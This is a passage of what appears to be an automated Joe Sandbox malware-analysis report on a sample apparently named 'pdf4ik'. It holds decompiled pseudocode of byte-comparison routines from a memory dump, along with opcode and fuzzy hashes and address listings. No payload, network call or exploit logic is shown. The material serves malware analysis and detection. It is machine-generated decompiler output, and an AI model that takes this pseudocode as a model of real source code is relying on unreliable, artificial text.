                                        								__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                        								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                        								if(__esi != 0) {
                                        									__edx = 0;
                                        									_t31 = (0 | __esi > 0x00000000) - 1; // -1
                                        									__esi = (__esi > 0) + _t31;
                                        								}
                                        								goto L15;
                                        							}
                                        							__edx = 0;
                                        							__edx = 0 | __esi > 0x00000000;
                                        							_t25 = __edx - 1; // -1
                                        							__esi = __edx + _t25;
                                        							if(__edx + _t25 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L12;
                                        						}
                                        						__edx = 0;
                                        						__edx = 0 | __esi > 0x00000000;
                                        						_t19 = __edx - 1; // -1
                                        						__esi = __edx + _t19;
                                        						if(__edx + _t19 != 0) {
                                        							goto L1;
                                        						}
                                        						goto L10;
                                        					}
                                        					__edx = 0;
                                        					__edx = 0 | __esi > 0x00000000;
                                        					_t13 = __edx - 1; // -1
                                        					__esi = __edx + _t13;
                                        					if(__edx + _t13 != 0) {
                                        						goto L1;
                                        					}
                                        					goto L8;
                                        				}
                                        				L1:
                                        				_t192 = _t284;
                                        				goto L3;
                                        			}


                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                        • Instruction ID: a31962c88d749db111f1b8da4516c12b95a7eade15df23135d68090a18841976
                                        • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                        • Instruction Fuzzy Hash: 47C18173D1E5B309872A452D453832FFFE26E81A4071BC39ADDD53F98AC6276E02A5D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29DBA448(void* __eax, void* __ecx) {
                                        				void* _t183;
                                        				signed int _t184;
                                        				void* _t187;
                                        				signed char _t192;
                                        				signed char _t193;
                                        				signed char _t194;
                                        				signed char _t195;
                                        				signed char _t197;
                                        				signed int _t271;
                                        				void* _t274;
                                        				void* _t276;
                                        				void* _t278;
                                        				void* _t281;
                                        				void* _t283;
                                        				void* _t285;
                                        				void* _t288;
                                        				void* _t290;
                                        				void* _t292;
                                        				void* _t295;
                                        				void* _t297;
                                        				void* _t299;
                                        				void* _t302;
                                        				void* _t304;
                                        				void* _t306;
                                        				void* _t309;
                                        				void* _t311;
                                        				void* _t313;
                                        
                                        				_t187 = __ecx;
                                        				_t183 = __eax;
                                        				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
                                        					_t271 = 0;
                                        					L12:
                                        					if(_t271 != 0) {
                                        						goto L1;
                                        					}
                                        					_t192 =  *(_t183 - 0x19);
                                        					if(_t192 ==  *(_t187 - 0x19)) {
                                        						_t271 = 0;
                                        						L23:
                                        						if(_t271 != 0) {
                                        							goto L1;
                                        						}
                                        						_t193 =  *(_t183 - 0x15);
                                        						if(_t193 ==  *(_t187 - 0x15)) {
                                        							_t271 = 0;
                                        							L34:
                                        							if(_t271 != 0) {
                                        								goto L1;
                                        							}
                                        							_t194 =  *(_t183 - 0x11);
                                        							if(_t194 ==  *(_t187 - 0x11)) {
                                        								_t271 = 0;
                                        								L45:
                                        								if(_t271 != 0) {
                                        									goto L1;
                                        								}
                                        								_t195 =  *(_t183 - 0xd);
                                        								if(_t195 ==  *(_t187 - 0xd)) {
                                        									_t271 = 0;
                                        									L56:
                                        									if(_t271 != 0) {
                                        										goto L1;
                                        									}
                                        									if( *(_t183 - 9) ==  *(_t187 - 9)) {
                                        										_t271 = 0;
                                        										L67:
                                        										if(_t271 != 0) {
                                        											goto L1;
                                        										}
                                        										_t197 =  *(_t183 - 5);
                                        										if(_t197 ==  *(_t187 - 5)) {
                                        											_t271 = 0;
                                        											L78:
                                        											if(_t271 != 0) {
                                        												goto L1;
                                        											}
                                        											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
                                        											if(_t184 != 0) {
                                        												_t182 = (0 | _t184 > 0x00000000) - 1; // -1
                                        												_t184 = (_t184 > 0) + _t182;
                                        											}
                                        											L2:
                                        											return _t184;
                                        										}
                                        										_t274 = (_t197 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
                                        										if(_t274 == 0) {
                                        											L71:
                                        											_t276 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
                                        											if(_t276 == 0) {
                                        												L73:
                                        												_t278 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
                                        												if(_t278 == 0) {
                                        													L75:
                                        													_t271 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
                                        													if(_t271 != 0) {
                                        														_t176 = (0 | _t271 > 0x00000000) - 1; // -1
                                        														_t271 = (_t271 > 0) + _t176;
                                        													}
                                        													goto L78;
                                        												}
                                        												_t170 = (0 | _t278 > 0x00000000) - 1; // -1
                                        												_t271 = (_t278 > 0) + _t170;
                                        												if(_t271 != 0) {
                                        													goto L1;
                                        												}
                                        												goto L75;
                                        											}
                                        											_t164 = (0 | _t276 > 0x00000000) - 1; // -1
                                        											_t271 = (_t276 > 0) + _t164;
                                        											if(_t271 != 0) {
                                        												goto L1;
                                        											}
                                        											goto L73;
                                        										}
                                        										_t158 = (0 | _t274 > 0x00000000) - 1; // -1
                                        										_t271 = (_t274 > 0) + _t158;
                                        										if(_t271 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L71;
                                        									}
                                        									_t281 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
                                        									if(_t281 == 0) {
                                        										L60:
                                        										_t283 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
                                        										if(_t283 == 0) {
                                        											L62:
                                        											_t285 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
                                        											if(_t285 == 0) {
                                        												L64:
                                        												_t271 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
                                        												if(_t271 != 0) {
                                        													_t151 = (0 | _t271 > 0x00000000) - 1; // -1
                                        													_t271 = (_t271 > 0) + _t151;
                                        												}
                                        												goto L67;
                                        											}
                                        											_t145 = (0 | _t285 > 0x00000000) - 1; // -1
                                        											_t271 = (_t285 > 0) + _t145;
                                        											if(_t271 != 0) {
                                        												goto L1;
                                        											}
                                        											goto L64;
                                        										}
                                        										_t139 = (0 | _t283 > 0x00000000) - 1; // -1
                                        										_t271 = (_t283 > 0) + _t139;
                                        										if(_t271 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L62;
                                        									}
                                        									_t133 = (0 | _t281 > 0x00000000) - 1; // -1
                                        									_t271 = (_t281 > 0) + _t133;
                                        									if(_t271 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L60;
                                        								}
                                        								_t288 = (_t195 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
                                        								if(_t288 == 0) {
                                        									L49:
                                        									_t290 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
                                        									if(_t290 == 0) {
                                        										L51:
                                        										_t292 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
                                        										if(_t292 == 0) {
                                        											L53:
                                        											_t271 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
                                        											if(_t271 != 0) {
                                        												_t125 = (0 | _t271 > 0x00000000) - 1; // -1
                                        												_t271 = (_t271 > 0) + _t125;
                                        											}
                                        											goto L56;
                                        										}
                                        										_t119 = (0 | _t292 > 0x00000000) - 1; // -1
                                        										_t271 = (_t292 > 0) + _t119;
                                        										if(_t271 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L53;
                                        									}
                                        									_t113 = (0 | _t290 > 0x00000000) - 1; // -1
                                        									_t271 = (_t290 > 0) + _t113;
                                        									if(_t271 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L51;
                                        								}
                                        								_t107 = (0 | _t288 > 0x00000000) - 1; // -1
                                        								_t271 = (_t288 > 0) + _t107;
                                        								if(_t271 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L49;
                                        							}
                                        							_t295 = (_t194 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
                                        							if(_t295 == 0) {
                                        								L38:
                                        								_t297 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
                                        								if(_t297 == 0) {
                                        									L40:
                                        									_t299 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
                                        									if(_t299 == 0) {
                                        										L42:
                                        										_t271 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
                                        										if(_t271 != 0) {
                                        											_t100 = (0 | _t271 > 0x00000000) - 1; // -1
                                        											_t271 = (_t271 > 0) + _t100;
                                        										}
                                        										goto L45;
                                        									}
                                        									_t94 = (0 | _t299 > 0x00000000) - 1; // -1
                                        									_t271 = (_t299 > 0) + _t94;
                                        									if(_t271 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L42;
                                        								}
                                        								_t88 = (0 | _t297 > 0x00000000) - 1; // -1
                                        								_t271 = (_t297 > 0) + _t88;
                                        								if(_t271 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L40;
                                        							}
                                        							_t82 = (0 | _t295 > 0x00000000) - 1; // -1
                                        							_t271 = (_t295 > 0) + _t82;
                                        							if(_t271 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L38;
                                        						}
                                        						_t302 = (_t193 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
                                        						if(_t302 == 0) {
                                        							L27:
                                        							_t304 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
                                        							if(_t304 == 0) {
                                        								L29:
                                        								_t306 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
                                        								if(_t306 == 0) {
                                        									L31:
                                        									_t271 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
                                        									if(_t271 != 0) {
                                        										_t75 = (0 | _t271 > 0x00000000) - 1; // -1
                                        										_t271 = (_t271 > 0) + _t75;
                                        									}
                                        									goto L34;
                                        								}
                                        								_t69 = (0 | _t306 > 0x00000000) - 1; // -1
                                        								_t271 = (_t306 > 0) + _t69;
                                        								if(_t271 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L31;
                                        							}
                                        							_t63 = (0 | _t304 > 0x00000000) - 1; // -1
                                        							_t271 = (_t304 > 0) + _t63;
                                        							if(_t271 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L29;
                                        						}
                                        						_t57 = (0 | _t302 > 0x00000000) - 1; // -1
                                        						_t271 = (_t302 > 0) + _t57;
                                        						if(_t271 != 0) {
                                        							goto L1;
                                        						}
                                        						goto L27;
                                        					}
                                        					_t309 = (_t192 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
                                        					if(_t309 == 0) {
                                        						L16:
                                        						_t311 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
                                        						if(_t311 == 0) {
                                        							L18:
                                        							_t313 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
                                        							if(_t313 == 0) {
                                        								L20:
                                        								_t271 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
                                        								if(_t271 != 0) {
                                        									_t50 = (0 | _t271 > 0x00000000) - 1; // -1
                                        									_t271 = (_t271 > 0) + _t50;
                                        								}
                                        								goto L23;
                                        							}
                                        							_t44 = (0 | _t313 > 0x00000000) - 1; // -1
                                        							_t271 = (_t313 > 0) + _t44;
                                        							if(_t271 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L20;
                                        						}
                                        						_t38 = (0 | _t311 > 0x00000000) - 1; // -1
                                        						_t271 = (_t311 > 0) + _t38;
                                        						if(_t271 != 0) {
                                        							goto L1;
                                        						}
                                        						goto L18;
                                        					}
                                        					_t32 = (0 | _t309 > 0x00000000) - 1; // -1
                                        					_t271 = (_t309 > 0) + _t32;
                                        					if(_t271 != 0) {
                                        						goto L1;
                                        					}
                                        					goto L16;
                                        				} else {
                                        					__esi = __dl & 0x000000ff;
                                        					__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                        					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                        					if(__esi == 0) {
                                        						L5:
                                        						__esi =  *(__eax - 0x1c) & 0x000000ff;
                                        						__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                        						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                        						if(__esi == 0) {
                                        							L7:
                                        							__esi =  *(__eax - 0x1b) & 0x000000ff;
                                        							__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                        							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                        							if(__esi == 0) {
                                        								L9:
                                        								__esi =  *(__eax - 0x1a) & 0x000000ff;
                                        								__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                        								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                        								if(__esi != 0) {
                                        									__edx = 0;
                                        									_t25 = (0 | __esi > 0x00000000) - 1; // -1
                                        									__esi = (__esi > 0) + _t25;
                                        								}
                                        								goto L12;
                                        							}
                                        							__edx = 0;
                                        							__edx = 0 | __esi > 0x00000000;
                                        							_t19 = __edx - 1; // -1
                                        							__esi = __edx + _t19;
                                        							if(__edx + _t19 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L9;
                                        						}
                                        						__edx = 0;
                                        						__edx = 0 | __esi > 0x00000000;
                                        						_t13 = __edx - 1; // -1
                                        						__esi = __edx + _t13;
                                        						if(__edx + _t13 != 0) {
                                        							goto L1;
                                        						}
                                        						goto L7;
                                        					}
                                        					__edx = 0;
                                        					__edx = 0 | __esi > 0x00000000;
                                        					_t7 = __edx - 1; // -1
                                        					__esi = __edx + _t7;
                                        					if(__edx + _t7 != 0) {
                                        						goto L1;
                                        					}
                                        					goto L5;
                                        				}
                                        				L1:
                                        				_t184 = _t271;
                                        				goto L2;
                                        			}































                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                        • Instruction ID: 684b432443cfaca46e11b1c0fbba725efb2f22bfe2e7e8f7be94853a989c26a3
                                        • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                        • Instruction Fuzzy Hash: 99C19473D1E9B305873A452D452832FFFE15E81A8171BC399CDD53F98AC6236E06A5D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29DBA0AA(void* __eax, void* __ecx) {
                                        				void* _t177;
                                        				signed int _t178;
                                        				void* _t181;
                                        				signed char _t186;
                                        				signed char _t187;
                                        				signed char _t188;
                                        				signed char _t190;
                                        				signed char _t191;
                                        				signed int _t197;
                                        				signed int _t263;
                                        				void* _t266;
                                        				void* _t268;
                                        				void* _t270;
                                        				void* _t272;
                                        				void* _t274;
                                        				void* _t276;
                                        				void* _t279;
                                        				void* _t281;
                                        				void* _t283;
                                        				void* _t286;
                                        				void* _t288;
                                        				void* _t290;
                                        				void* _t293;
                                        				void* _t295;
                                        				void* _t297;
                                        				void* _t300;
                                        				void* _t302;
                                        				void* _t304;
                                        
                                        				_t181 = __ecx;
                                        				_t177 = __eax;
                                        				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
                                        					_t263 = 0;
                                        					L11:
                                        					if(_t263 != 0) {
                                        						goto L1;
                                        					}
                                        					_t186 =  *(_t177 - 0x18);
                                        					if(_t186 ==  *(_t181 - 0x18)) {
                                        						_t263 = 0;
                                        						L22:
                                        						if(_t263 != 0) {
                                        							goto L1;
                                        						}
                                        						_t187 =  *(_t177 - 0x14);
                                        						if(_t187 ==  *(_t181 - 0x14)) {
                                        							_t263 = 0;
                                        							L33:
                                        							if(_t263 != 0) {
                                        								goto L1;
                                        							}
                                        							_t188 =  *(_t177 - 0x10);
                                        							if(_t188 ==  *(_t181 - 0x10)) {
                                        								_t263 = 0;
                                        								L44:
                                        								if(_t263 != 0) {
                                        									goto L1;
                                        								}
                                        								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
                                        									_t263 = 0;
                                        									L55:
                                        									if(_t263 != 0) {
                                        										goto L1;
                                        									}
                                        									_t190 =  *(_t177 - 8);
                                        									if(_t190 ==  *(_t181 - 8)) {
                                        										_t263 = 0;
                                        										L66:
                                        										if(_t263 != 0) {
                                        											goto L1;
                                        										}
                                        										_t191 =  *(_t177 - 4);
                                        										if(_t191 ==  *(_t181 - 4)) {
                                        											_t178 = 0;
                                        											L78:
                                        											if(_t178 == 0) {
                                        												_t178 = 0;
                                        											}
                                        											L80:
                                        											return _t178;
                                        										}
                                        										_t266 = (_t191 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
                                        										if(_t266 == 0) {
                                        											L70:
                                        											_t268 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
                                        											if(_t268 == 0) {
                                        												L72:
                                        												_t270 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
                                        												if(_t270 == 0) {
                                        													L75:
                                        													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
                                        													if(_t178 != 0) {
                                        														_t176 = (0 | _t178 > 0x00000000) - 1; // -1
                                        														_t178 = (_t178 > 0) + _t176;
                                        													}
                                        													goto L78;
                                        												}
                                        												_t197 = (0 | _t270 > 0x00000000) + (0 | _t270 > 0x00000000) - 1;
                                        												if(_t197 == 0) {
                                        													goto L75;
                                        												}
                                        												L74:
                                        												_t178 = _t197;
                                        												goto L78;
                                        											}
                                        											_t197 = (0 | _t268 > 0x00000000) + (0 | _t268 > 0x00000000) - 1;
                                        											if(_t197 != 0) {
                                        												goto L74;
                                        											}
                                        											goto L72;
                                        										}
                                        										_t197 = (0 | _t266 > 0x00000000) + (0 | _t266 > 0x00000000) - 1;
                                        										if(_t197 != 0) {
                                        											goto L74;
                                        										}
                                        										goto L70;
                                        									}
                                        									_t272 = (_t190 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
                                        									if(_t272 == 0) {
                                        										L59:
                                        										_t274 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
                                        										if(_t274 == 0) {
                                        											L61:
                                        											_t276 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
                                        											if(_t276 == 0) {
                                        												L63:
                                        												_t263 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
                                        												if(_t263 != 0) {
                                        													_t151 = (0 | _t263 > 0x00000000) - 1; // -1
                                        													_t263 = (_t263 > 0) + _t151;
                                        												}
                                        												goto L66;
                                        											}
                                        											_t145 = (0 | _t276 > 0x00000000) - 1; // -1
                                        											_t263 = (_t276 > 0) + _t145;
                                        											if(_t263 != 0) {
                                        												goto L1;
                                        											}
                                        											goto L63;
                                        										}
                                        										_t139 = (0 | _t274 > 0x00000000) - 1; // -1
                                        										_t263 = (_t274 > 0) + _t139;
                                        										if(_t263 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L61;
                                        									}
                                        									_t133 = (0 | _t272 > 0x00000000) - 1; // -1
                                        									_t263 = (_t272 > 0) + _t133;
                                        									if(_t263 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L59;
                                        								}
                                        								_t279 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
                                        								if(_t279 == 0) {
                                        									L48:
                                        									_t281 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
                                        									if(_t281 == 0) {
                                        										L50:
                                        										_t283 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
                                        										if(_t283 == 0) {
                                        											L52:
                                        											_t263 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
                                        											if(_t263 != 0) {
                                        												_t126 = (0 | _t263 > 0x00000000) - 1; // -1
                                        												_t263 = (_t263 > 0) + _t126;
                                        											}
                                        											goto L55;
                                        										}
                                        										_t120 = (0 | _t283 > 0x00000000) - 1; // -1
                                        										_t263 = (_t283 > 0) + _t120;
                                        										if(_t263 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L52;
                                        									}
                                        									_t114 = (0 | _t281 > 0x00000000) - 1; // -1
                                        									_t263 = (_t281 > 0) + _t114;
                                        									if(_t263 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L50;
                                        								}
                                        								_t108 = (0 | _t279 > 0x00000000) - 1; // -1
                                        								_t263 = (_t279 > 0) + _t108;
                                        								if(_t263 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L48;
                                        							}
                                        							_t286 = (_t188 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
                                        							if(_t286 == 0) {
                                        								L37:
                                        								_t288 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
                                        								if(_t288 == 0) {
                                        									L39:
                                        									_t290 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
                                        									if(_t290 == 0) {
                                        										L41:
                                        										_t263 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
                                        										if(_t263 != 0) {
                                        											_t100 = (0 | _t263 > 0x00000000) - 1; // -1
                                        											_t263 = (_t263 > 0) + _t100;
                                        										}
                                        										goto L44;
                                        									}
                                        									_t94 = (0 | _t290 > 0x00000000) - 1; // -1
                                        									_t263 = (_t290 > 0) + _t94;
                                        									if(_t263 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L41;
                                        								}
                                        								_t88 = (0 | _t288 > 0x00000000) - 1; // -1
                                        								_t263 = (_t288 > 0) + _t88;
                                        								if(_t263 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L39;
                                        							}
                                        							_t82 = (0 | _t286 > 0x00000000) - 1; // -1
                                        							_t263 = (_t286 > 0) + _t82;
                                        							if(_t263 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L37;
                                        						}
                                        						_t293 = (_t187 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
                                        						if(_t293 == 0) {
                                        							L26:
                                        							_t295 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
                                        							if(_t295 == 0) {
                                        								L28:
                                        								_t297 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
                                        								if(_t297 == 0) {
                                        									L30:
                                        									_t263 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
                                        									if(_t263 != 0) {
                                        										_t75 = (0 | _t263 > 0x00000000) - 1; // -1
                                        										_t263 = (_t263 > 0) + _t75;
                                        									}
                                        									goto L33;
                                        								}
                                        								_t69 = (0 | _t297 > 0x00000000) - 1; // -1
                                        								_t263 = (_t297 > 0) + _t69;
                                        								if(_t263 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L30;
                                        							}
                                        							_t63 = (0 | _t295 > 0x00000000) - 1; // -1
                                        							_t263 = (_t295 > 0) + _t63;
                                        							if(_t263 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L28;
                                        						}
                                        						_t57 = (0 | _t293 > 0x00000000) - 1; // -1
                                        						_t263 = (_t293 > 0) + _t57;
                                        						if(_t263 != 0) {
                                        							goto L1;
                                        						}
                                        						goto L26;
                                        					}
                                        					_t300 = (_t186 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
                                        					if(_t300 == 0) {
                                        						L15:
                                        						_t302 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
                                        						if(_t302 == 0) {
                                        							L17:
                                        							_t304 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
                                        							if(_t304 == 0) {
                                        								L19:
                                        								_t263 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
                                        								if(_t263 != 0) {
                                        									_t50 = (0 | _t263 > 0x00000000) - 1; // -1
                                        									_t263 = (_t263 > 0) + _t50;
                                        								}
                                        								goto L22;
                                        							}
                                        							_t44 = (0 | _t304 > 0x00000000) - 1; // -1
                                        							_t263 = (_t304 > 0) + _t44;
                                        							if(_t263 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L19;
                                        						}
                                        						_t38 = (0 | _t302 > 0x00000000) - 1; // -1
                                        						_t263 = (_t302 > 0) + _t38;
                                        						if(_t263 != 0) {
                                        							goto L1;
                                        						}
                                        						goto L17;
                                        					}
                                        					_t32 = (0 | _t300 > 0x00000000) - 1; // -1
                                        					_t263 = (_t300 > 0) + _t32;
                                        					if(_t263 != 0) {
                                        						goto L1;
                                        					}
                                        					goto L15;
                                        				} else {
                                        					__esi = __dl & 0x000000ff;
                                        					__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                        					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                        					if(__esi == 0) {
                                        						L4:
                                        						__esi =  *(__eax - 0x1b) & 0x000000ff;
                                        						__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                        						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                        						if(__esi == 0) {
                                        							L6:
                                        							__esi =  *(__eax - 0x1a) & 0x000000ff;
                                        							__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                        							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                        							if(__esi == 0) {
                                        								L8:
                                        								__esi =  *(__eax - 0x19) & 0x000000ff;
                                        								__edx =  *(__ecx - 0x19) & 0x000000ff;
                                        								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                                        								if(__esi != 0) {
                                        									__edx = 0;
                                        									_t25 = (0 | __esi > 0x00000000) - 1; // -1
                                        									__esi = (__esi > 0) + _t25;
                                        								}
                                        								goto L11;
                                        							}
                                        							__edx = 0;
                                        							__edx = 0 | __esi > 0x00000000;
                                        							_t19 = __edx - 1; // -1
                                        							__esi = __edx + _t19;
                                        							if(__edx + _t19 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L8;
                                        						}
                                        						__edx = 0;
                                        						__edx = 0 | __esi > 0x00000000;
                                        						_t13 = __edx - 1; // -1
                                        						__esi = __edx + _t13;
                                        						if(__edx + _t13 != 0) {
                                        							goto L1;
                                        						}
                                        						goto L6;
                                        					}
                                        					__edx = 0;
                                        					__edx = 0 | __esi > 0x00000000;
                                        					_t7 = __edx - 1; // -1
                                        					__esi = __edx + _t7;
                                        					if(__edx + _t7 != 0) {
                                        						goto L1;
                                        					}
                                        					goto L4;
                                        				}
                                        				L1:
                                        				_t178 = _t263;
                                        				goto L80;
                                        			}































                                        0x29dba28d
                                        0x29dba268
                                        0x29dba268
                                        0x29dba26e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba26e
                                        0x29dba249
                                        0x29dba249
                                        0x29dba24f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba24f
                                        0x29dba1b7
                                        0x29dba1b9
                                        0x29dba1ce
                                        0x29dba1d6
                                        0x29dba1d8
                                        0x29dba1ed
                                        0x29dba1f5
                                        0x29dba1f7
                                        0x29dba20c
                                        0x29dba214
                                        0x29dba216
                                        0x29dba21f
                                        0x29dba21f
                                        0x29dba21f
                                        0x00000000
                                        0x29dba216
                                        0x29dba200
                                        0x29dba200
                                        0x29dba206
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba206
                                        0x29dba1e1
                                        0x29dba1e1
                                        0x29dba1e7
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba1e7
                                        0x29dba1c2
                                        0x29dba1c2
                                        0x29dba1c8
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba1c8
                                        0x29dba130
                                        0x29dba132
                                        0x29dba147
                                        0x29dba14f
                                        0x29dba151
                                        0x29dba166
                                        0x29dba16e
                                        0x29dba170
                                        0x29dba185
                                        0x29dba18d
                                        0x29dba18f
                                        0x29dba198
                                        0x29dba198
                                        0x29dba198
